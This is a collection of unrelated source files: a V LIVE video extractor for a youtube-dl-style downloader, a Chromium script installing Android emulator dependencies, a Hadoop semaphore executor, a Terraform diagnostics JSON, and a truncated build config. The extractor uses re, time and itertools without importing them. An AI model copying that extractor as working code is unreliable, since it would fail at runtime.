from .common import InfoExtractor
from ..compat import (
compat_urllib_parse_urlencode,
compat_str,
)
from ..utils import (
dict_get,
ExtractorError,
float_or_none,
int_or_none,
remove_start,
try_get,
urlencode_postdata,
)
class VLiveIE(InfoExtractor):
    """Extractor for single V LIVE videos (live broadcasts and replays)."""
    IE_NAME = 'vlive'
    _VALID_URL = r'https?://(?:(?:www|m)\.)?vlive\.tv/video/(?P<id>[0-9]+)'
    _TESTS = [{
        'url': 'http://www.vlive.tv/video/1326',
        'md5': 'cc7314812855ce56de70a06a27314983',
        'info_dict': {
            'id': '1326',
            'ext': 'mp4',
            'title': "[V LIVE] Girl's Day's Broadcast",
            'creator': "Girl's Day",
            'view_count': int,
        },
    }, {
        'url': 'http://www.vlive.tv/video/16937',
        'info_dict': {
            'id': '16937',
            'ext': 'mp4',
            'title': '[V LIVE] 첸백시 걍방',
            'creator': 'EXO',
            'view_count': int,
            'subtitles': 'mincount:12',
        },
        'params': {
            'skip_download': True,
        },
    }]

    @classmethod
    def suitable(cls, url):
        # Playlist URLs also match _VALID_URL; defer to VLivePlaylistIE.
        return False if VLivePlaylistIE.suitable(url) else super(VLiveIE, cls).suitable(url)

    def _real_extract(self, url):
        video_id = self._match_id(url)
        webpage = self._download_webpage(
            'http://www.vlive.tv/video/%s' % video_id, video_id)
        # Arguments of the vlive.video.init(...) JS call embedded in the page.
        VIDEO_PARAMS_RE = r'\bvlive\.video\.init\(([^)]+)'
        VIDEO_PARAMS_FIELD = 'video params'
        # First try to parse the argument list as JSON (wrapped in [...]).
        params = self._parse_json(self._search_regex(
            VIDEO_PARAMS_RE, webpage, VIDEO_PARAMS_FIELD, default=''), video_id,
            transform_source=lambda s: '[' + s + ']', fatal=False)
        if not params or len(params) < 7:
            # Fallback: naive comma split with quote stripping.
            params = self._search_regex(
                VIDEO_PARAMS_RE, webpage, VIDEO_PARAMS_FIELD)
            params = [p.strip(r'"') for p in re.split(r'\s*,\s*', params)]
        # Positional arguments: [2]=status, [5]=long video id, [6]=key.
        status, long_video_id, key = params[2], params[5], params[6]
        status = remove_start(status, 'PRODUCT_')
        if status in ('LIVE_ON_AIR', 'BIG_EVENT_ON_AIR'):
            return self._live(video_id, webpage)
        elif status in ('VOD_ON_AIR', 'BIG_EVENT_INTRO'):
            if long_video_id and key:
                return self._replay(video_id, webpage, long_video_id, key)
            else:
                # VOD announced but not yet playable.
                status = 'COMING_SOON'
        if status == 'LIVE_END':
            raise ExtractorError('Uploading for replay. Please wait...',
                                 expected=True)
        elif status == 'COMING_SOON':
            raise ExtractorError('Coming soon!', expected=True)
        elif status == 'CANCELED':
            raise ExtractorError('We are sorry, '
                                 'but the live broadcast has been canceled.',
                                 expected=True)
        else:
            raise ExtractorError('Unknown status %s' % status)

    def _get_common_fields(self, webpage):
        """Fields shared by the live and replay code paths."""
        title = self._og_search_title(webpage)
        creator = self._html_search_regex(
            r'<div[^>]+class="info_area"[^>]*>\s*<a\s+[^>]*>([^<]+)',
            webpage, 'creator', fatal=False)
        thumbnail = self._og_search_thumbnail(webpage)
        return {
            'title': title,
            'creator': creator,
            'thumbnail': thumbnail,
        }

    def _live(self, video_id, webpage):
        """Extract formats for an ongoing live broadcast (HLS streams)."""
        init_page = self._download_webpage(
            'http://www.vlive.tv/video/init/view',
            video_id, note='Downloading live webpage',
            data=urlencode_postdata({'videoSeq': video_id}),
            headers={
                'Referer': 'http://www.vlive.tv/video/%s' % video_id,
                'Content-Type': 'application/x-www-form-urlencoded'
            })
        live_params = self._search_regex(
            r'"liveStreamInfo"\s*:\s*(".*"),',
            init_page, 'live stream info')
        # liveStreamInfo is a JSON string containing JSON — decode twice.
        live_params = self._parse_json(live_params, video_id)
        live_params = self._parse_json(live_params, video_id)
        formats = []
        for vid in live_params.get('resolutions', []):
            formats.extend(self._extract_m3u8_formats(
                vid['cdnUrl'], video_id, 'mp4',
                m3u8_id=vid.get('name'),
                fatal=False, live=True))
        self._sort_formats(formats)
        info = self._get_common_fields(webpage)
        info.update({
            'title': self._live_title(info['title']),
            'id': video_id,
            'formats': formats,
            'is_live': True,
        })
        return info

    def _replay(self, video_id, webpage, long_video_id, key):
        """Extract formats/subtitles for a finished broadcast (VOD replay)."""
        playinfo = self._download_json(
            'http://global.apis.naver.com/rmcnmv/rmcnmv/vod_play_videoInfo.json?%s'
            % compat_urllib_parse_urlencode({
                'videoId': long_video_id,
                'key': key,
                'ptc': 'http',
                'doct': 'json',  # document type (xml or json)
                'cpt': 'vtt',  # captions type (vtt or ttml)
            }), video_id)
        formats = [{
            'url': vid['source'],
            'format_id': vid.get('encodingOption', {}).get('name'),
            'abr': float_or_none(vid.get('bitrate', {}).get('audio')),
            'vbr': float_or_none(vid.get('bitrate', {}).get('video')),
            'width': int_or_none(vid.get('encodingOption', {}).get('width')),
            'height': int_or_none(vid.get('encodingOption', {}).get('height')),
            'filesize': int_or_none(vid.get('size')),
        } for vid in playinfo.get('videos', {}).get('list', []) if vid.get('source')]
        self._sort_formats(formats)
        view_count = int_or_none(playinfo.get('meta', {}).get('count'))
        subtitles = {}
        for caption in playinfo.get('captions', {}).get('list', []):
            # First non-empty of several possible language keys.
            lang = dict_get(caption, ('locale', 'language', 'country', 'label'))
            if lang and caption.get('source'):
                subtitles[lang] = [{
                    'ext': 'vtt',
                    'url': caption['source']}]
        info = self._get_common_fields(webpage)
        info.update({
            'id': video_id,
            'formats': formats,
            'view_count': view_count,
            'subtitles': subtitles,
        })
        return info
class VLiveChannelIE(InfoExtractor):
    """Extractor for whole V LIVE channels (paginated video lists)."""
    IE_NAME = 'vlive:channel'
    _VALID_URL = r'https?://channels\.vlive\.tv/(?P<id>[0-9A-Z]+)'
    _TEST = {
        'url': 'http://channels.vlive.tv/FCD4B',
        'info_dict': {
            'id': 'FCD4B',
            'title': 'MAMAMOO',
        },
        'playlist_mincount': 110
    }
    # Fallback application id used when it cannot be scraped from app.js.
    _APP_ID = '8c6cc7b45d2568fb668be6e05b6e5a3b'

    def _real_extract(self, url):
        channel_code = self._match_id(url)
        webpage = self._download_webpage(
            'http://channels.vlive.tv/%s/video' % channel_code, channel_code)
        # Try to scrape a fresh app id from the channel page's app.js.
        app_id = None
        app_js_url = self._search_regex(
            r'<script[^>]+src=(["\'])(?P<url>http.+?/app\.js.*?)\1',
            webpage, 'app js', default=None, group='url')
        if app_js_url:
            app_js = self._download_webpage(
                app_js_url, channel_code, 'Downloading app JS', fatal=False)
            if app_js:
                app_id = self._search_regex(
                    r'Global\.VFAN_APP_ID\s*=\s*[\'"]([^\'"]+)[\'"]',
                    app_js, 'app id', default=None)
        app_id = app_id or self._APP_ID
        # Resolve the public channel code to the internal channelSeq.
        channel_info = self._download_json(
            'http://api.vfan.vlive.tv/vproxy/channelplus/decodeChannelCode',
            channel_code, note='Downloading decode channel code',
            query={
                'app_id': app_id,
                'channelCode': channel_code,
                '_': int(time.time())  # cache buster
            })
        channel_seq = channel_info['result']['channelSeq']
        channel_name = None
        entries = []
        # Page through the channel's video list until an empty page.
        for page_num in itertools.count(1):
            video_list = self._download_json(
                'http://api.vfan.vlive.tv/vproxy/channelplus/getChannelVideoList',
                channel_code, note='Downloading channel list page #%d' % page_num,
                query={
                    'app_id': app_id,
                    'channelSeq': channel_seq,
                    # Large values of maxNumOfRows (~300 or above) may cause
                    # empty responses (see [1]), e.g. this happens for [2] that
                    # has more than 300 videos.
                    # 1. https://github.com/rg3/youtube-dl/issues/13830
                    # 2. http://channels.vlive.tv/EDBF.
                    'maxNumOfRows': 100,
                    '_': int(time.time()),
                    'pageNo': page_num
                }
            )
            if not channel_name:
                channel_name = try_get(
                    video_list,
                    lambda x: x['result']['channelInfo']['channelName'],
                    compat_str)
            videos = try_get(
                video_list, lambda x: x['result']['videoList'], list)
            if not videos:
                break
            for video in videos:
                video_id = video.get('videoSeq')
                if not video_id:
                    continue
                video_id = compat_str(video_id)
                entries.append(
                    self.url_result(
                        'http://www.vlive.tv/video/%s' % video_id,
                        ie=VLiveIE.ie_key(), video_id=video_id))
        return self.playlist_result(
            entries, channel_code, channel_name)
class VLivePlaylistIE(InfoExtractor):
    """Extractor for V LIVE multicam playlists attached to a video."""
    IE_NAME = 'vlive:playlist'
    _VALID_URL = r'https?://(?:(?:www|m)\.)?vlive\.tv/video/(?P<video_id>[0-9]+)/playlist/(?P<id>[0-9]+)'
    _TEST = {
        'url': 'http://www.vlive.tv/video/22867/playlist/22912',
        'info_dict': {
            'id': '22912',
            'title': 'Valentine Day Message from TWICE'
        },
        'playlist_mincount': 9
    }

    def _real_extract(self, url):
        mobj = re.match(self._VALID_URL, url)
        video_id, playlist_id = mobj.group('video_id', 'id')
        VIDEO_URL_TEMPLATE = 'http://www.vlive.tv/video/%s'
        # --no-playlist: delegate the single video to VLiveIE.
        if self._downloader.params.get('noplaylist'):
            self.to_screen(
                'Downloading just video %s because of --no-playlist' % video_id)
            return self.url_result(
                VIDEO_URL_TEMPLATE % video_id,
                ie=VLiveIE.ie_key(), video_id=video_id)
        self.to_screen(
            'Downloading playlist %s - add --no-playlist to just download video'
            % playlist_id)
        webpage = self._download_webpage(
            'http://www.vlive.tv/video/%s/playlist/%s'
            % (video_id, playlist_id), playlist_id)
        # JS array of the member video ids of this playlist.
        item_ids = self._parse_json(
            self._search_regex(
                r'playlistVideoSeqs\s*=\s*(\[[^]]+\])', webpage,
                'playlist video seqs'),
            playlist_id)
        entries = [
            self.url_result(
                VIDEO_URL_TEMPLATE % item_id, ie=VLiveIE.ie_key(),
                video_id=compat_str(item_id))
            for item_id in item_ids]
        playlist_name = self._html_search_regex(
            r'<div[^>]+class="[^"]*multicam_playlist[^>]*>\s*<h3[^>]+>([^<]+)',
            webpage, 'playlist title', fatal=False)
        return self.playlist_result(entries, playlist_id, playlist_name)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Installs deps for using SDK emulator for testing.
The script will download the SDK and system images, if they are not present, and
install and enable KVM, if virtualization has been enabled in the BIOS.
"""
import logging
import optparse
import os
import re
import shutil
import sys
from pylib import cmd_helper
from pylib import constants
from pylib import pexpect
from pylib.utils import run_tests_helper
# Android API level
DEFAULT_ANDROID_API_LEVEL = constants.ANDROID_SDK_VERSION
# From the Android Developer's website.
# Keep this up to date; the user can install older API levels as necessary.
SDK_BASE_URL = 'http://dl.google.com/android/adt'
SDK_ZIP = 'adt-bundle-linux-x86_64-20131030.zip'
# pylint: disable=C0301
# Android x86 system image from the Intel website:
# http://software.intel.com/en-us/articles/intel-eula-x86-android-4-2-jelly-bean-bin
# These don't exist prior to Android-15.
# As of 08 Nov 2013, Android-19 is not yet available either.
X86_IMG_URLS = {
15: 'https://software.intel.com/sites/landingpage/android/sysimg_x86-15_r01.zip',
16: 'https://software.intel.com/sites/landingpage/android/sysimg_x86-16_r01.zip',
17: 'https://software.intel.com/sites/landingpage/android/sysimg_x86-17_r01.zip',
18: 'https://software.intel.com/sites/landingpage/android/sysimg_x86-18_r01.zip',
19: 'https://software.intel.com/sites/landingpage/android/sysimg_x86-19_r01.zip'}
#pylint: enable=C0301
def CheckSDK():
  """Check whether the emulator SDK has already been fetched.

  Returns:
    True if the emulator SDK directory (src/android_emulator_sdk/) exists.
  """
  sdk_root = constants.EMULATOR_SDK_ROOT
  return os.path.exists(sdk_root)
def CheckSDKPlatform(api_level=DEFAULT_ANDROID_API_LEVEL):
  """Check if the "SDK Platform" for the specified API level is installed.

  The emulator can only run against a target whose platform is present.

  Args:
    api_level: the Android API level to check; defaults to the latest API.

  Returns:
    True if the platform is already installed.
  """
  android_binary = os.path.join(constants.EMULATOR_SDK_ROOT,
                                'sdk', 'tools', 'android')
  wanted = re.compile('id: [0-9]+ or "android-%d"' % api_level)
  try:
    exit_code, stdout = cmd_helper.GetCmdStatusAndOutput(
        [android_binary, 'list'])
  except OSError:
    logging.exception('Unable to execute \'android list\'')
    return False
  # A non-OSError failure of the tool is fatal, exactly as before: the
  # raised Exception is not caught by the OSError handler.
  if exit_code != 0:
    raise Exception('\'android list\' command failed')
  return any(wanted.match(line) for line in stdout.split('\n'))
def CheckX86Image(api_level=DEFAULT_ANDROID_API_LEVEL):
  """Check if Android system images have been installed.

  Args:
    api_level: the Android API level to check for; defaults to the latest API.

  Returns:
    True if sdk/system-images/android-<api_level>/x86 exists inside
    EMULATOR_SDK_ROOT.
  """
  image_dir = os.path.join(constants.EMULATOR_SDK_ROOT, 'sdk',
                           'system-images', 'android-%d' % api_level, 'x86')
  return os.path.exists(image_dir)
def CheckKVM():
  """Quickly check whether KVM is enabled.

  Returns:
    True iff /dev/kvm exists (Linux only).
  """
  kvm_device = '/dev/kvm'
  return os.path.exists(kvm_device)
def RunKvmOk():
  """Run kvm-ok as root to check that KVM is properly enabled after installation
  of the required packages.

  Returns:
    True iff KVM is enabled (/dev/kvm exists). On failure, returns False
    but also print detailed information explaining why KVM isn't enabled
    (e.g. CPU doesn't support it, or BIOS disabled it).
  """
  # kvm-ok lives in /usr/sbin, so it must always be run through 'sudo'.
  try:
    exit_code = cmd_helper.RunCmd(['sudo', 'kvm-ok'])
  except OSError:
    logging.info('kvm-ok not installed')
    return False
  return exit_code == 0
def GetSDK():
  """Download the SDK and unzip it into EMULATOR_SDK_ROOT.

  Raises:
    Exception: if the SDK bundle could not be downloaded or unzipped.
  """
  logging.info('Download Android SDK.')
  sdk_url = '%s/%s' % (SDK_BASE_URL, SDK_ZIP)
  try:
    cmd_helper.RunCmd(['curl', '-o', '/tmp/sdk.zip', sdk_url])
    # Function-call form keeps this consistent with the print() calls in
    # GetSDKPlatform() and works on both Python 2 and 3 (the old
    # "print '...'" statement form was Python-2-only).
    print('curled unzipping...')
    rc = cmd_helper.RunCmd(['unzip', '-o', '/tmp/sdk.zip', '-d', '/tmp/'])
    if rc:
      raise Exception('ERROR: could not download/unzip Android SDK.')
    # Get the name of the sub-directory that everything will be extracted to.
    dirname, _ = os.path.splitext(SDK_ZIP)
    zip_dir = '/tmp/%s' % dirname
    # Move the extracted directory to EMULATOR_SDK_ROOT
    shutil.move(zip_dir, constants.EMULATOR_SDK_ROOT)
  finally:
    # Only unlink if the file exists: if curl itself failed to run, the zip
    # was never created and an unconditional unlink would raise a second
    # OSError that masks the original failure.
    if os.path.exists('/tmp/sdk.zip'):
      os.unlink('/tmp/sdk.zip')
def InstallKVM():
  """Installs KVM packages."""
  if cmd_helper.RunCmd(['sudo', 'apt-get', 'install', 'kvm']):
    logging.critical('ERROR: Did not install KVM. Make sure hardware '
                     'virtualization is enabled in BIOS (i.e. Intel VT-x or '
                     'AMD SVM).')
  # TODO(navabi): Use modprobe kvm-amd on AMD processors.
  if cmd_helper.RunCmd(['sudo', 'modprobe', 'kvm-intel']):
    logging.critical('ERROR: Did not add KVM module to Linux Kernel. Make sure '
                     'hardware virtualization is enabled in BIOS.')
  # Now check to ensure KVM acceleration can be used.
  if not RunKvmOk():
    logging.critical('ERROR: Can not use KVM acceleration. Make sure hardware '
                     'virtualization is enabled in BIOS (i.e. Intel VT-x or '
                     'AMD SVM).')
def GetX86Image(api_level=DEFAULT_ANDROID_API_LEVEL):
  """Download x86 system image from Intel's website.

  Args:
    api_level: the Android API level to download for.

  Raises:
    Exception: if no image URL is known for api_level, or the download
      or unzip step fails.
  """
  logging.info('Download x86 system image directory into sdk directory.')
  # TODO(andrewhayden): Use python tempfile lib instead
  temp_file = '/tmp/x86_img_android-%d.zip' % api_level
  if api_level not in X86_IMG_URLS:
    raise Exception('ERROR: no URL known for x86 image for android-%s' %
                    api_level)
  try:
    cmd_helper.RunCmd(['curl', '-o', temp_file, X86_IMG_URLS[api_level]])
    rc = cmd_helper.RunCmd(['unzip', '-o', temp_file, '-d', '/tmp/'])
    if rc:
      raise Exception('ERROR: Could not download/unzip image zip.')
    api_target = 'android-%d' % api_level
    sys_imgs = os.path.join(constants.EMULATOR_SDK_ROOT, 'sdk',
                            'system-images', api_target, 'x86')
    logging.info('Deploying system image to %s' % sys_imgs)
    shutil.move('/tmp/x86', sys_imgs)
  finally:
    # Only unlink if the file exists: if curl failed to run at all, the zip
    # was never created and unlinking it would raise a second OSError that
    # masks the original error.
    if os.path.exists(temp_file):
      os.unlink(temp_file)
def GetSDKPlatform(api_level=DEFAULT_ANDROID_API_LEVEL):
  """Update the SDK to include the platform specified.

  Args:
    api_level: the Android API level to download

  Raises:
    Exception: if listing the SDK fails, the license prompt never appears,
      the install does not complete, or no matching update is found.
  """
  android_binary = os.path.join(constants.EMULATOR_SDK_ROOT,
                                'sdk', 'tools', 'android')
  # Raw string: '\s' and '\.' are invalid escape sequences in a plain
  # string literal and trigger a DeprecationWarning on modern Python.
  pattern = re.compile(
      r'\s*([0-9]+)- SDK Platform Android [\.,0-9]+, API %d.*' % api_level)
  # Example:
  #   2- SDK Platform Android 4.3, API 18, revision 2
  exit_code, stdout = cmd_helper.GetCmdStatusAndOutput(
      [android_binary, 'list', 'sdk'])
  if exit_code != 0:
    raise Exception('\'android list sdk\' command return %d' % exit_code)
  for line in stdout.split('\n'):
    match = pattern.match(line)
    if match:
      index = match.group(1)
      print('package %s corresponds to platform level %d' % (index, api_level))
      # update sdk --no-ui --filter $INDEX
      update_command = [android_binary,
                        'update', 'sdk', '--no-ui', '--filter', index]
      update_command_str = ' '.join(update_command)
      logging.info('running update command: %s' % update_command_str)
      update_process = pexpect.spawn(update_command_str)
      # TODO(andrewhayden): Do we need to bug the user about this?
      if update_process.expect('Do you accept the license') != 0:
        raise Exception('License agreement check failed')
      update_process.sendline('y')
      if update_process.expect('Done. 1 package installed.') == 0:
        print('Successfully installed platform for API level %d' % api_level)
        return
      else:
        raise Exception('Failed to install platform update')
  raise Exception('Could not find android-%d update for the SDK!' % api_level)
def main(argv):
  """Ensure the SDK, target platform, x86 image and KVM are all available.

  Args:
    argv: full command line; argv[0] is the program name.
  """
  opt_parser = optparse.OptionParser(
      description='Install dependencies for running the Android emulator')
  opt_parser.add_option('--api-level', dest='api_level',
      help='The API level (e.g., 19 for Android 4.4) to ensure is available',
      type='int', default=DEFAULT_ANDROID_API_LEVEL)
  opt_parser.add_option('-v', dest='verbose', action='store_true',
                        help='enable verbose logging')
  options, _ = opt_parser.parse_args(argv[1:])

  # run_tests_helper will set logging to INFO or DEBUG
  # We achieve verbose output by configuring it with 2 (==DEBUG)
  verbosity = 2 if options.verbose else 1
  logging.basicConfig(level=logging.INFO,
                      format='# %(asctime)-15s: %(message)s')
  run_tests_helper.SetLogLevel(verbose_count=verbosity)

  # Calls below will download emulator SDK and/or system images only if needed.
  if CheckSDK():
    logging.info('android_emulator_sdk/ already exists, skipping download.')
  else:
    GetSDK()

  # Check target. The target has to be installed in order to run the emulator.
  if CheckSDKPlatform(options.api_level):
    logging.info('SDK platform android-%d already present, skipping.' %
                 options.api_level)
  else:
    logging.info('SDK platform android-%d not present, installing.' %
                 options.api_level)
    GetSDKPlatform(options.api_level)

  # Download the x86 system image only if needed.
  if CheckX86Image(options.api_level):
    logging.info('x86 image for android-%d already present, skipping.' %
                 options.api_level)
  else:
    GetX86Image(options.api_level)

  # Make sure KVM packages are installed and enabled.
  if CheckKVM():
    logging.info('KVM already installed and enabled.')
  else:
    InstallKVM()


if __name__ == '__main__':
  sys.exit(main(sys.argv))
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.util;
import org.apache.hadoop.thirdparty.com.google.common.util.concurrent.ForwardingExecutorService;
import org.apache.hadoop.thirdparty.com.google.common.util.concurrent.Futures;
import org.apache.hadoop.classification.InterfaceAudience;
import org.apache.hadoop.fs.statistics.DurationTracker;
import org.apache.hadoop.fs.statistics.DurationTrackerFactory;
import java.util.Collection;
import java.util.List;
import java.util.concurrent.Callable;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Future;
import java.util.concurrent.Semaphore;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
import static java.util.Objects.requireNonNull;
import static org.apache.hadoop.fs.statistics.IOStatisticsSupport.stubDurationTrackerFactory;
import static org.apache.hadoop.fs.statistics.StoreStatisticNames.ACTION_EXECUTOR_ACQUIRED;
/**
* This ExecutorService blocks the submission of new tasks when its queue is
* already full by using a semaphore. Task submissions require permits, task
* completions release permits.
* <p>
* This is a refactoring of {@link BlockingThreadPoolExecutorService}; that code
* contains the thread pool logic, whereas this isolates the semaphore
* and submit logic for use with other thread pools and delegation models.
* <p>
* This is inspired by <a href="https://github.com/apache/incubator-s4/blob/master/subprojects/s4-comm/src/main/java/org/apache/s4/comm/staging/BlockingThreadPoolExecutorService.java">
* this s4 threadpool</a>
*/
@SuppressWarnings("NullableProblems")
@InterfaceAudience.Private
public class SemaphoredDelegatingExecutor extends
    ForwardingExecutorService {

  // Bounds the number of tasks queued or running in the delegate: acquired
  // before a task is handed over, released by the wrapper when it finishes.
  private final Semaphore queueingPermits;
  // The executor all work is forwarded to (see delegate()).
  private final ExecutorService executorDelegatee;
  // Total permits, as passed to the constructor; exposed via getPermitCount().
  private final int permitCount;
  // Times how long submitters block in acquire(); never null (stub if unset).
  private final DurationTrackerFactory trackerFactory;

  /**
   * Instantiate.
   * @param executorDelegatee Executor to delegate to
   * @param permitCount number of permits into the queue permitted
   * @param fair should the semaphore be "fair"
   * @param trackerFactory duration tracker factory.
   */
  public SemaphoredDelegatingExecutor(
      ExecutorService executorDelegatee,
      int permitCount,
      boolean fair,
      DurationTrackerFactory trackerFactory) {
    this.permitCount = permitCount;
    queueingPermits = new Semaphore(permitCount, fair);
    this.executorDelegatee = requireNonNull(executorDelegatee);
    // Fall back to a no-op tracker so callers may pass null.
    this.trackerFactory = trackerFactory != null
        ? trackerFactory
        : stubDurationTrackerFactory();
  }

  /**
   * Instantiate without collecting executor aquisition duration information.
   * @param executorDelegatee Executor to delegate to
   * @param permitCount number of permits into the queue permitted
   * @param fair should the semaphore be "fair"
   */
  public SemaphoredDelegatingExecutor(
      ExecutorService executorDelegatee,
      int permitCount,
      boolean fair) {
    this(executorDelegatee, permitCount, fair, null);
  }

  @Override
  protected ExecutorService delegate() {
    return executorDelegatee;
  }

  // The bulk invoke/invokeAny operations are deliberately unsupported: they
  // would bypass the one-permit-per-task accounting below.
  @Override
  public <T> List<Future<T>> invokeAll(Collection<? extends Callable<T>> tasks)
      throws InterruptedException {
    throw new RuntimeException("Not implemented");
  }

  @Override
  public <T> List<Future<T>> invokeAll(Collection<? extends Callable<T>> tasks,
      long timeout, TimeUnit unit) throws InterruptedException {
    throw new RuntimeException("Not implemented");
  }

  @Override
  public <T> T invokeAny(Collection<? extends Callable<T>> tasks)
      throws InterruptedException, ExecutionException {
    throw new RuntimeException("Not implemented");
  }

  @Override
  public <T> T invokeAny(Collection<? extends Callable<T>> tasks, long timeout,
      TimeUnit unit)
      throws InterruptedException, ExecutionException, TimeoutException {
    throw new RuntimeException("Not implemented");
  }

  // Blocks until a permit is available (the try-with-resources tracker times
  // the wait); on interrupt, restores the flag and fails the future instead
  // of submitting.
  @Override
  public <T> Future<T> submit(Callable<T> task) {
    try (DurationTracker ignored =
             trackerFactory.trackDuration(ACTION_EXECUTOR_ACQUIRED)) {
      queueingPermits.acquire();
    } catch (InterruptedException e) {
      Thread.currentThread().interrupt();
      return Futures.immediateFailedFuture(e);
    }
    return super.submit(new CallableWithPermitRelease<>(task));
  }

  @Override
  public <T> Future<T> submit(Runnable task, T result) {
    try (DurationTracker ignored =
             trackerFactory.trackDuration(ACTION_EXECUTOR_ACQUIRED)) {
      queueingPermits.acquire();
    } catch (InterruptedException e) {
      Thread.currentThread().interrupt();
      return Futures.immediateFailedFuture(e);
    }
    return super.submit(new RunnableWithPermitRelease(task), result);
  }

  @Override
  public Future<?> submit(Runnable task) {
    try (DurationTracker ignored =
             trackerFactory.trackDuration(ACTION_EXECUTOR_ACQUIRED)) {
      queueingPermits.acquire();
    } catch (InterruptedException e) {
      Thread.currentThread().interrupt();
      return Futures.immediateFailedFuture(e);
    }
    return super.submit(new RunnableWithPermitRelease(task));
  }

  @Override
  public void execute(Runnable command) {
    try (DurationTracker ignored =
             trackerFactory.trackDuration(ACTION_EXECUTOR_ACQUIRED)) {
      queueingPermits.acquire();
    } catch (InterruptedException e) {
      Thread.currentThread().interrupt();
      // NOTE(review): unlike the submit() overloads, execution still proceeds
      // after an interrupt here, and the wrapper below will release a permit
      // that was never acquired — confirm this asymmetry is intentional.
    }
    super.execute(new RunnableWithPermitRelease(command));
  }

  /**
   * Get the number of permits available; guaranteed to be
   * {@code 0 <= availablePermits <= size}.
   * @return the number of permits available at the time of invocation.
   */
  public int getAvailablePermits() {
    return queueingPermits.availablePermits();
  }

  /**
   * Get the number of threads waiting to acquire a permit.
   * @return snapshot of the length of the queue of blocked threads.
   */
  public int getWaitingCount() {
    return queueingPermits.getQueueLength();
  }

  /**
   * Total number of permits.
   * @return the number of permits as set in the constructor
   */
  public int getPermitCount() {
    return permitCount;
  }

  @Override
  public String toString() {
    final StringBuilder sb = new StringBuilder(
        "SemaphoredDelegatingExecutor{");
    sb.append("permitCount=").append(getPermitCount())
        .append(", available=").append(getAvailablePermits())
        .append(", waiting=").append(getWaitingCount())
        .append('}');
    return sb.toString();
  }

  /**
   * Releases a permit after the task is executed.
   */
  class RunnableWithPermitRelease implements Runnable {

    private Runnable delegatee;

    RunnableWithPermitRelease(Runnable delegatee) {
      this.delegatee = delegatee;
    }

    @Override
    public void run() {
      try {
        delegatee.run();
      } finally {
        // Always release, even if the task threw.
        queueingPermits.release();
      }
    }
  }

  /**
   * Releases a permit after the task is completed.
   */
  class CallableWithPermitRelease<T> implements Callable<T> {

    private Callable<T> delegatee;

    CallableWithPermitRelease(Callable<T> delegatee) {
      this.delegatee = delegatee;
    }

    @Override
    public T call() throws Exception {
      try {
        return delegatee.call();
      } finally {
        // Always release, even if the task threw.
        queueingPermits.release();
      }
    }
  }
}
|
java
|
github
|
https://github.com/apache/hadoop
|
hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/util/SemaphoredDelegatingExecutor.java
|
{
"format_version": "1.0",
"valid": false,
"error_count": 4,
"warning_count": 0,
"diagnostics": [
{
"severity": "error",
"summary": "Missing required argument",
"detail": "The argument \"source\" is required, but no definition was found.",
"range": {
"filename": "testdata/validate-invalid/incorrectmodulename/main.tf",
"start": {
"line": 1,
"column": 23,
"byte": 22
},
"end": {
"line": 1,
"column": 24,
"byte": 23
}
},
"snippet": {
"context": "module \"super#module\"",
"code": "module \"super#module\" {",
"start_line": 1,
"highlight_start_offset": 22,
"highlight_end_offset": 23,
"values": []
}
},
{
"severity": "error",
"summary": "Invalid module instance name",
"detail": "A name must start with a letter or underscore and may contain only letters, digits, underscores, and dashes.",
"range": {
"filename": "testdata/validate-invalid/incorrectmodulename/main.tf",
"start": {
"line": 1,
"column": 8,
"byte": 7
},
"end": {
"line": 1,
"column": 22,
"byte": 21
}
},
"snippet": {
"context": "module \"super#module\"",
"code": "module \"super#module\" {",
"start_line": 1,
"highlight_start_offset": 7,
"highlight_end_offset": 21,
"values": []
}
},
{
"severity": "error",
"summary": "Variables not allowed",
"detail": "Variables may not be used here.",
"range": {
"filename": "testdata/validate-invalid/incorrectmodulename/main.tf",
"start": {
"line": 5,
"column": 12,
"byte": 55
},
"end": {
"line": 5,
"column": 15,
"byte": 58
}
},
"snippet": {
"context": "module \"super\"",
"code": " source = var.modulename",
"start_line": 5,
"highlight_start_offset": 11,
"highlight_end_offset": 14,
"values": []
}
},
{
"severity": "error",
"summary": "Unsuitable value type",
"detail": "Unsuitable value: value must be known",
"range": {
"filename": "testdata/validate-invalid/incorrectmodulename/main.tf",
"start": {
"line": 5,
"column": 12,
"byte": 55
},
"end": {
"line": 5,
"column": 26,
"byte": 69
}
},
"snippet": {
"context": "module \"super\"",
"code": " source = var.modulename",
"start_line": 5,
"highlight_start_offset": 11,
"highlight_end_offset": 25,
"values": []
}
}
]
}
|
json
|
github
|
https://github.com/hashicorp/terraform
|
internal/command/testdata/validate-invalid/incorrectmodulename/output.json
|
# Build configuration for the "tester" executable, keyed per toolchain
# ("gnu", "msvc", "clang").

# Name of the output binary.
exe = "tester"

# Active toolchain: "gnu" or "clang"
toolchain = "gnu"

# Optional: depth of the link job pool.
link_pool_depth = 1

# Optional: build output directory per toolchain.
builddir = {
    "gnu": "build",
    "msvc": "build",
    "clang": "build",
}

# Include-path flags per toolchain.
includes = {
    "gnu": ["-I."],
    "msvc": ["/I."],
    "clang": ["-I."],
}

# Preprocessor defines per toolchain (none needed).
defines = {
    "gnu": [],
    "msvc": [],
    "clang": [],
}

# C compiler flags per toolchain.
cflags = {
    "gnu": ["-O2", "-g"],
    "msvc": ["/O2"],
    "clang": ["-O2", "-g"],
}

# C++ compiler flags per toolchain.
# Warn as much as possible:
# http://qiita.com/MitsutakaTakeda/items/6b9966f890cc9b944d75
cxxflags = {
